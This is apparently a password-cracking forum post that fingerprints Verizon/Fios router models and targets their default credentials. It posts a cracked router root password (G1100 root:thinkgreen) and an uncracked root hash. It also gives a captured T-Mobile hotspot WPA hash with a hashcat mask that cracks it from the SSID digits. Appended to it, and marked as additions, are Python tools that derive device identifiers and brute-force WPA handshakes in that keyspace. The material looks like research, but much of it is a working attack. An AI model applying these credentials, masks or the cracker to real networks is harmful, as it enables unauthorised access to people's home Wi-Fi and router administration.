07-12-2025, 09:55 PM
I didn’t bother to run the scrapes again this week. Since we are really only catching newly listed hits, I will probably update the database every 2-3 weeks from now on. That doesn’t mean that we don’t have some good info to share this week though!
This week I posted the root hashes that I've found for G1100 and NCQ1338, and @Sparton has successfully cracked the G1100 root:thinkgreen. THANKS! We are still looking for $1$7uheFpms$9IpAGF0yM8EV4CvwnpgD.1
I also reached out to @RealEnder, who shared the hcxpcapngtool -D output for all of the Verizon/Fios captures uploaded to WPA-SEC. As we know, the broadcast packets give us the MAC, MANUFACTURER, MODELNAME, SERIALNUMBER, DEVICENAME, UUID, ESSID. The first thing that I did was look for new Models. There are a good many MiFi devices. I looked a few of these up on eBay, and it doesn’t seem like they show their default password since the device has a screen. There are also a good many Extenders/Repeaters that are just broadcasting the Verizon/Fios SSID.
![[Image: attachment.php?aid=1355]](https://hashcat.net/forum/attachment.php?aid=1355)
The one new device that I was able to identify is the LVR5-100, which is a 5G/4G cellular router manufactured by Wistron NeWeb. The device teardown shows the CPU is an STM32WB35, which is an Arm Cortex-M4 32-bit RISC core operating at a frequency of up to 64 MHz. Unfortunately, it doesn't have a QR code, so we haven't caught it with our scrape. There are only 2 entries for this device, which is unfortunate because the password is an easy-to-crack 8-character lowercase HEX! This model has been included with LVSKIHP in the packet database.
There is a device that just shows Broadcom and the same SN/UUID for all of the entries. I checked the MAC prefixes 10:78:5B and 70:F2:20 in the password database and identified this model as the WCB6200Q. The only model that I didn't find entries for is the ASK-RTL108, but there are a ton of entries for ALL of the other devices covered in this thread. Let's take a look...
Attachment: verizon_broadcast_info.xlsx (801.98 KB)
The verizon_broadcast_info data contains:
ARC-XCI55AX - 688 entries
ASK-NCM1100 - 49 entries
ASK-NCQ1338E - 671 entries
CR1000 - 2448 entries
CME1000 - 18 entries
E3200 - 669 entries
FSNO21VA - 132 entries
G1100 - 2793 entries
G3100 - 3081 entries
LVSKIHP - 15 entries
NVG558HX - 23 entries
WCB6200Q - 265 entries
WNC-CR200A - 327 entries
Total - 11179 entries
Note: Here MACS is what I've been calling "steps" throughout the thread. It's calculated by comparing the differences in MAC address vs. the differences in serial number. This results in a whole number that indicates how many MAC addresses each device occupies.
Model: ARC-XCI55AX
Manufacturer: Arcadyan
Device: Titan2
Serial Prefix: ABU GRR
Serial Length: 11
MACS: 4
MAC Prefix: 04:09:86 04:70:56 18:58:80 4C:22:F3 54:B7:BD 74:90:BC 84:90:0A 84:A3:29 8C:83:94 A8:A2:37 AC:B6:87 BC:F8:7E C0:D7:AA C8:99:B2 DC:F5:1B F4:CA:E7
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 04098647eaa3 = bc329e001dd811b2860104098647eaa2
SSID: Verizon_XXXXXX

Model: ASK-NCM1100
Manufacturer: Arcadyan
Device: TITAN4
Serial Prefix: ACL ACN ACQ ACR
Serial Length: 11
MACS: 6
MAC Prefix: 38:88:71
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 3888710aee34 = bc329e001dd811b286013888710aee32
SSID: Verizon_XXXXXX

Model: ASK-NCQ1338E
Manufacturer: Askey
Device: NCQ1338
Serial Prefix: AA1 AAM ABB ABF ABG G1C G1D G1E
Serial Length: 11
MACS: 4
MAC Prefix: 88:DE:7C 2C:EA:DC 4C:AB:F8 A4:97:33 FC:12:63 74:93:DA
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 2ceadc10f653 = 876543219abcdef012342ceadc10f652
SSID: Verizon_XXXXXX

Model: CR1000
Manufacturer: Arcadyan
Device: ath1 or CHR2f
Serial Prefix: ABJ AB2 AAW AAY ACZ ABP ABQ ABV ABW
Serial Length: 11
MACS: 7 (CR1000A) or 9 (CR1000B)
MAC Prefix: 04:70:56 58:96:71 04:09:86 1C:D6:BE 24:41:FE 34:19:4D 3C:F0:83 4C:22:F3 54:B7:BD 74:90:BC 78:67:0E 84:90:0A 84:A3:29 86:67:0E 88:5A:85 8C:83:94 A8:A2:37 AC:91:9B AC:B6:87 BC:F8:7E C8:99:B2 DC:4B:A1 DC:F5:1B
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address. This matches what we discovered earlier.
EX: 047056582046 = 876543219abcdef01234047056582044
SSID: FiOS-XXXXX, Fios-XXXXX or Verizon_XXXXXX

Model: CME1000
Manufacturer: Arcadyan
Device: CHR2tte
Serial Prefix: ABA
Serial Length: 11
MACS: 6
MAC Prefix: 4C:22:F3 54:B7:BD 74:90:BC 84:A3:29 8C:83:94 BC:F8:7E DC:F5:1B
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 4c22f34c6688 = bc329e001dd811b286014c22f34c6686
SSID: Verizon_XXXXXX

Model: E3200
Manufacturer: Arcadyan
Device: E3200
Serial Prefix: E301 E302 AA62 AA63 AA64
Serial Length: 16
MACS: 6
MAC Prefix: 04:A2:22 3C:BD:C5 62:A2:22 62:BD:C5 62:F8:53 6A:A2:22 6A:BD:C5 6A:F8:53 72:A2:22 72:BD:C5 72:F8:53 74:90:BC B8:F8:53 DC:F5:1B
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX

Model: FSNO21VA
Manufacturer: Arcadyan
Device: ath0
Serial Prefix: ABH
Serial Length: 11
MACS: 1
MAC Prefix: 98:C8:54
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, but the last 6 digits of X don't match the MAC address
EX: 98c854a7a4e0 = 876543219abcdef0123498c8549951e8
EX: 98c854a8d4af = 876543219abcdef0123498c8549aaa86
SSID: Verizon_XXXXXX

Model: G1100
Manufacturer: GreenWave
Device: GreenWave
Serial Prefix: G1A1 G1A2 S1A1
Serial Length: 15
MACS: 5
MAC Prefix: 18:78:D4 20:C0:47 20:C0:C7 29:6A:0B 48:5D:36 C8:A7:0A D4:A9:28
UUID: Appears to be random
SSID: FiOS-XXXXX or Fios-XXXXX

Model: G3100
Manufacturer: Arcadyan
Device: G3100
Serial Prefix: G401 G402
Serial Length: 16
MACS: 11 or 8 depending on manufacture date
MAC Prefix: 04:A2:22 3C:BD:C5 B8:F8:53
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX

Model: LVSKIHP
Manufacturer: WNC
Device: Verizon K2
Serial Prefix: GI1A GI1B (identified from image scrape data)
Serial Length: 12
MACS: Unknown
MAC Prefix: 64:FF:0A 88:5A:85 B8:9F:09 44:E4:EE
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address.
EX: 64ff0a558556 = 876543219abcdef0123464ff0a558554
SSID: Verizon-5G-Home-XXXX or Verizon-LRV5-XXXX

Model: NVG558HX
Manufacturer: Commscope
Device: <same as Serial Number>
Serial Prefix: MV2
MACS: 12
MAC Prefix: 20:F3:75 58:60:D8 8C:5A:25 E4:F7:5B
UUID: Appears to be random
SSID: Verizon-XXXX

Model: WCB6200Q
Manufacturer: Broadcom
Device: <blank>
Serial Prefix: GWXA GWXB MWXB (identified from image scrape data)
Serial Length: 14
MACS: 16 (calculated from image scrape data)
MAC Prefix: 10:78:5B 4C:8B:30 70:F2:20
UUID: ALL entries show a single UUID d96c7efc2f8938f1efbd6e5148bfa812
SSID: FiOS-XXXXX or Fios-XXXXX
Note: This device is an extender only, so it is broadcasting the base SSID/Password

Model: WNC-CR200A
Manufacturer: Arcadyan
Device: ath0 or ath1
Serial Prefix: ACA AC0
Serial Length: 11
MACS: 4
MAC Prefix: 58:96:71 24:41:FE AC:91:9B DC:4B:A1
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 589671080e92 = 876543219abcdef01234589671080e91
SSID: Verizon_XXXXXX
I noticed that the new model from last week, the CME1000, has the device name CHR2tte, which looks very similar to CHR2f (CR1000). So I added it to the firmware fuzzing script and we found the firmware for it!
Code:
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.9.bin
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.11.bin
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.12.bin
It seems to extract OK with unblob, leaving us with 3 files. Unfortunately the root is LUKS encrypted, and this is where I'm stuck.
![[Image: attachment.php?aid=1351]](https://hashcat.net/forum/attachment.php?aid=1351)
Code:
cat CONTROL
BOARD=mt7986a-ax8400-2500wan-emmc-rfb-sb
file kernel
Device Tree Blob version 17, size=21649753, boot CPU=0, string block size=194, DT structure block size=21649160
file root
LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: 8856759b-9e7d-41db-b48e-7f1deb53cbb0
Code:
binwalk -Me chr2tte_fw_3.2.0.9.bin
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
Analyzed 1 file for 85 file signatures (187 magic patterns) in 173.0 milliseconds
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
[+] Extraction of tarball data at offset 0x100 completed successfully
---------------------------------------------------------------------------------------------------
sysupgrade-mt7986a-ax8400-2500wan-emmc-rfb-sb/kernel
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
0 0x0 Device tree blob (DTB), version: 17, CPU ID: 0, total size: 21649465 bytes
----------------------------------------------------------------------------------------------------
[+] Extraction of dtb data at offset 0x0 completed successfully
----------------------------------------------------------------------------------------------------
Analyzed 5 files for 85 file signatures (187 magic patterns) in 1.5 seconds
![[Image: attachment.php?aid=1352]](https://hashcat.net/forum/attachment.php?aid=1352)
Last week's scrape caught a TMOHS1 from T-Mobile. I noticed that it has a HUGE weakness. They use the last 8 digits of the IMEI as the password, and the last 4 digits for the SSID. The admin password is even easier to "guess" 🤣
I reached out to @RealEnder with this info. He confirmed that only 2 of the submitted hashes had been found, but both of them followed this pattern. He was able to quickly crack most of the other hashes; there are now 42 found! Looking back at the found hashes, ALL of the passwords start with the first 4 digits 5000-7999. This leaves us with 3000 possible candidates, which means you could probably crack it live without a handshake haha. It's a very small contribution, but it makes me happy to have discovered this! Using this hashcat command should instantly crack the hash; here we are on a Raspberry Pi 4.
T-Mobile Hotspot_3613_2.4GHz
WPA*02*f61b53de19d07fb2f875d56fa45269bf*a4d7952abcb0*3e4bdfe15ce0*542d4d6f62696c6520486f7473706f745f333631335f322e3447487a*92ca24dea47338cbdb9eb12cf752aee13e9d5cbab214df0e48ab880d9c1375b0*0103007502010a000000000000000000012513a7b3328129988b18743eadc5e58224c6afa79b6a47acf5ce1ae6c54f01d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*82
Code:
hashcat -m 22000 -a 3 TMobile.txt -1 567 ?1?d?d?d<4 digits from SSID>
hashcat -m 22000 -a 3 TMobile.txt -1 567 ?1?d?d?d3613
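The UUID-from-MAC relationship and the MACS ("steps") ratio that the post works out by hand for each Verizon model, as an added example that is not part of the original post. It takes records in the column order the post lists for hcxpcapngtool -D output (MAC, MANUFACTURER, MODELNAME, SERIALNUMBER, DEVICENAME, UUID, ESSID); the tab separation, the serial numbers in the sample and the assumption that the trailing digits of a serial are its sequence number are mine, while the MAC/UUID pairs are the post's own worked examples. Per model it reports the fixed UUID prefix with the MAC offset (1, 2, or none, as for the FSNO21VA) and derives the MAC step from consecutive serials; `mac_from_uuid` inverts the relationship.

```python
"""Check the UUID/MAC relationship and the MAC step ("MACS") the post works out
by hand for each Verizon model, over records in the column order it lists for
hcxpcapngtool -D output. Added example, not code from the post."""
import re
from collections import Counter, defaultdict

FIELDS = ("mac", "manufacturer", "model", "serial", "device", "uuid", "essid")

# Constructed sample. Tab separation and the serial numbers are assumptions;
# the MAC/UUID pairs are the worked examples given in the post.
SAMPLE = """\
04098647eaa3\tArcadyan\tARC-XCI55AX\tABU00000100\tTitan2\tbc329e001dd811b2860104098647eaa2\tVerizon_ABCDEF
04098647eaaf\tArcadyan\tARC-XCI55AX\tABU00000103\tTitan2\tbc329e001dd811b2860104098647eaae\tVerizon_AABBCC
04098647eac3\tArcadyan\tARC-XCI55AX\tABU00000108\tTitan2\tbc329e001dd811b2860104098647eac2\tVerizon_112233
3888710aee34\tArcadyan\tASK-NCM1100\tACL00000020\tTITAN4\tbc329e001dd811b286013888710aee32\tVerizon_445566
98c854a7a4e0\tArcadyan\tFSNO21VA\tABH00000001\tath0\t876543219abcdef0123498c8549951e8\tVerizon_778899
"""


def parse_records(text):
    """One dict per non-empty line, keyed by the -D column names."""
    return [dict(zip(FIELDS, line.split("\t"))) for line in text.splitlines() if line.strip()]


def uuid_offset(mac_hex, uuid_hex, max_offset=16):
    """(UUID prefix, offset) when the UUID's last 12 hex digits equal the
    broadcast MAC minus a small offset; offset is None when they do not."""
    prefix, suffix = uuid_hex[:-12], uuid_hex[-12:]
    offset = int(mac_hex, 16) - int(suffix, 16)
    return prefix, (offset if 0 <= offset <= max_offset else None)


def mac_from_uuid(uuid_hex, offset):
    """Invert the relationship: recover the broadcast MAC from a UUID."""
    return format(int(uuid_hex[-12:], 16) + offset, "012x")


def serial_counter(serial):
    """Assumption: the trailing digits of the serial are the production sequence number."""
    m = re.search(r"(\d+)$", serial)
    return int(m.group(1)) if m else None


def mac_steps(records):
    """MACS as the post defines it: delta MAC / delta serial between consecutive
    units of one model; the most common exact ratio is how many MAC addresses
    each unit occupies. None if fewer than two usable records."""
    points = sorted((serial_counter(r["serial"]), int(r["mac"], 16))
                    for r in records if serial_counter(r["serial"]) is not None)
    ratios = Counter()
    for (s1, m1), (s2, m2) in zip(points, points[1:]):
        ds, dm = s2 - s1, m2 - m1
        if ds > 0 and dm > 0 and dm % ds == 0:
            ratios[dm // ds] += 1
    return ratios.most_common(1)[0][0] if ratios else None


def summarise(text):
    """Per model: the set of (UUID prefix, offset) pairs seen and the MAC step."""
    by_model = defaultdict(list)
    for r in parse_records(text):
        by_model[r["model"]].append(r)
    return {model: {"uuid": {uuid_offset(r["mac"], r["uuid"]) for r in recs},
                    "macs": mac_steps(recs)}
            for model, recs in by_model.items()}


if __name__ == "__main__":
    for model, info in summarise(SAMPLE).items():
        print(model, info)
```

With real -D output the interesting cases are the models where `uuid` contains more than one offset (a firmware change) or where `macs` disagrees with the value calculated from the image scrape, since that is where the serial-to-MAC prediction breaks.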
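The same computation hashcat runs for `-m 22000` on the T-Mobile line above, written out as an added example (this is not the post's or hashcat's code): parse the WPA*02 EAPOL line, derive the PMK with PBKDF2, the PTK with PRF-512, and the EAPOL MIC with HMAC-MD5/SHA1, then walk the 3000-candidate keyspace the post describes (5000-7999 followed by the four SSID digits). The post's own hash line is kept only to show parsing; the demo line is constructed here for a known password with fabricated nonces, so the checker is self-verifying. Descriptor version 3 (AES-CMAC) is deliberately not handled.

```python
"""Offline check of WPA*02 (EAPOL) hash lines against the TMOHS1 keyspace the
post describes: four digits in 5000-7999 followed by the four digits in the SSID.
Added example, not from the post: it spells out the PBKDF2 -> PTK -> EAPOL-MIC
computation that hashcat -m 22000 performs, so the pattern can be tested
without hashcat."""
import hashlib
import hmac
import re

# Hash line quoted in the post (T-Mobile Hotspot_3613_2.4GHz); used here only to show parsing.
POST_LINE = ("WPA*02*f61b53de19d07fb2f875d56fa45269bf*a4d7952abcb0*3e4bdfe15ce0"
             "*542d4d6f62696c6520486f7473706f745f333631335f322e3447487a"
             "*92ca24dea47338cbdb9eb12cf752aee13e9d5cbab214df0e48ab880d9c1375b0"
             "*0103007502010a000000000000000000012513a7b3328129988b18743eadc5e58224c6afa79b6a47acf5ce1ae6c54f01d9"
             "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
             "001630140100000fac040100000fac040100000fac028000*82")


def parse_22000(line):
    """Split a hashcat 22000 line; only the EAPOL (type 02) variant is handled."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] != "02":
        raise ValueError("expected a WPA*02*... (EAPOL) hash line")
    return {"mic": bytes.fromhex(f[2]), "mac_ap": bytes.fromhex(f[3]),
            "mac_sta": bytes.fromhex(f[4]), "essid": bytes.fromhex(f[5]),
            "anonce": bytes.fromhex(f[6]), "eapol": bytes.fromhex(f[7])}


def prf_512(pmk, data):
    """IEEE 802.11 PRF-512: PTK from the PMK, both MACs and both nonces."""
    label = b"Pairwise key expansion\x00"
    return b"".join(hmac.new(pmk, label + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]


def eapol_mic(pmk, h):
    """Recompute the MIC of the captured EAPOL-Key frame (message 2) under pmk."""
    eapol = h["eapol"]
    snonce = eapol[17:49]                                   # key nonce field of message 2
    data = (b"".join(sorted([h["mac_ap"], h["mac_sta"]]))
            + b"".join(sorted([h["anonce"], snonce])))
    kck = prf_512(pmk, data)[:16]                           # first 128 bits of the PTK
    version = int.from_bytes(eapol[5:7], "big") & 0x7       # key-info descriptor version
    zeroed = eapol[:81] + bytes(16) + eapol[97:]            # MIC field zeroed for the HMAC
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()[:16]
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise NotImplementedError("descriptor version 3 (AES-128-CMAC) is not handled here")


def ssid_digits(essid):
    """The four digits between underscores in b'T-Mobile Hotspot_3613_2.4GHz'."""
    m = re.search(rb"_(\d{4})_", essid)
    if not m:
        raise ValueError("ESSID does not carry the TMOHS1 four-digit marker")
    return m.group(1).decode()


def candidates(digits, first_four=range(5000, 8000)):
    """The keyspace from the post: 5000-7999 followed by the SSID digits (3000 passwords)."""
    for n in first_four:
        yield f"{n:04d}{digits}"


def crack(line, first_four=range(5000, 8000)):
    """Return the passphrase from the TMOHS1 keyspace that validates the MIC, or None."""
    h = parse_22000(line)
    for pw in candidates(ssid_digits(h["essid"]), first_four):
        pmk = hashlib.pbkdf2_hmac("sha1", pw.encode(), h["essid"], 4096, 32)
        if hmac.compare_digest(eapol_mic(pmk, h), h["mic"]):
            return pw
    return None


def build_line(password, essid, mac_ap, mac_sta, anonce, snonce):
    """Constructed WPA*02 line for a known password (RSN, key-info 0x010a -> HMAC-SHA1 MIC),
    so the checker above can be exercised without a real capture."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac028000")
    body = (b"\x02\x01\x0a\x00\x00" + (1).to_bytes(8, "big") + snonce
            + bytes(16 + 8 + 8 + 16) + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    h = {"mac_ap": mac_ap, "mac_sta": mac_sta, "essid": essid.encode(),
         "anonce": anonce, "eapol": eapol}
    pmk = hashlib.pbkdf2_hmac("sha1", password.encode(), h["essid"], 4096, 32)
    return "*".join(["WPA", "02", eapol_mic(pmk, h).hex(), mac_ap.hex(), mac_sta.hex(),
                     h["essid"].hex(), anonce.hex(), eapol.hex(), "02"])


# Constructed demo handshake: fabricated nonces, MAC addresses taken from the post's line.
DEMO_LINE = build_line("50233613", "T-Mobile Hotspot_3613_2.4GHz",
                       bytes.fromhex("a4d7952abcb0"), bytes.fromhex("3e4bdfe15ce0"),
                       bytes(range(32)), bytes(range(32, 64)))

if __name__ == "__main__":
    print(crack(DEMO_LINE))   # found after 24 candidates; the whole keyspace is 3000
```

Each candidate costs one PBKDF2-HMAC-SHA1 with 4096 iterations, so even in pure Python the full 3000-entry keyspace takes seconds, which is the point the post makes about this pattern; the mask `-1 567 ?1?d?d?d3613` hands hashcat exactly the set `candidates("3613")` enumerates.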